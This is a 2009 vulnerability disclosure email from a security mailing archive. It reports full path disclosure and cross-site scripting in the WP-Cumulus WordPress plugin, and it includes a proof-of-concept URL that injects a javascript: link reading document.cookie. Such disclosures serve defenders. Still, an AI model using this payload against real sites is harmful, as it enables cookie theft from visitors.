Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [MORNINGSTAR-2009-
02] Multiple security issues in Cute News and UTF-8 Cute News

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:11.11.2009
Subject:Vulnerabilities in WP-Cumulus for WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Full path disclosure и Cross-Site Scripting
уязвимостях в плагине WP-Cumulus для WordPress.

Full path disclosure:

http://site/wp-content/plugins/wp-cumulus/wp-cumulus.php

XSS:

http://site/wp-content/plugins/wp-cumulus/tagcloud.
swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:
alert(document.cookie)'+style='font-size:
+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код исполнится при клике. Это Strictly social XSS.

Уязвимы WP-Cumulus 1.20 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3665/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server